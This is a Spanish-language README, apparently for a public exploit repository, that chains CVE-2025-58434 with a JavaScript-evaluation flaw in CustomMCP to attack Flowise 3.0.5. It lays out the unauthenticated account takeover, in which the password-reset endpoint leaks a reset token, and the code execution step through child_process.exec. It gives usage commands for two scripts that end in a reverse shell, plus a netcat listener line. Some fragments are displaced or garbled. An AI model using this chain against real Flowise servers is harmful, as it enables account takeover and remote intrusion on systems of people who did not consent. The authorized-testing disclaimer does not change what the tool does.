
Cadena de explotación para Flowise 3.0.5: toma de control de cuenta no autenticada mediante la divulgación del token de restablecimiento de contraseña (CVE-2025-58434) encadenada con la evaluación de JavaScript de CustomMCP para la ejecución remota de código.
Dos problemas de Flowise 3.0.5, encadenados:
POST /api/v1/account/forgot-password devuelve el tempToken del usuario objetivo
directamente en la respuesta JSON. Alimenta con él a POST /api/v1/account/reset-password
para establecer una contraseña conocida para cualquier cuenta, incluido el primer administrador -> toma de
control total de la cuenta no autenticada.mcpServerConfig de CustomMCP.
Con una sesión y una clave API del workspace (del paso 1),
POST /api/v1/node-load-method/customMCP con loadMethod=listActions
evalúa la cadena mcpServerConfig como JavaScript en el proceso de Flowise,
lo que otorga RCE mediante . (Problema separado de Flowise
utilizado aquí solo para convertir la ATO en ejecución de código; sin CVE asignado en el
momento de redactar esto.)require('child_process').exec()CVE: CVE-2025-58434
python3 -m pip install requests
flowise_ato_foothold.py - cadena completa (ATO -> clave API -> reverse shell de CustomMCP)python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# ten `nc -lvnp <LPORT>` listo
flowise_customMCP_rce.py - solo RCE de CustomMCP (necesita una clave API)python3 flowise_customMCP_rce.py '<comando>' '<FLOWISE_API_KEY>'
Solo para pruebas de seguridad autorizadas y fines educativos. Ejecuta esto únicamente contra sistemas que poseas o para los que tengas permiso explícito por escrito para probar.
Autor: r3vpwnx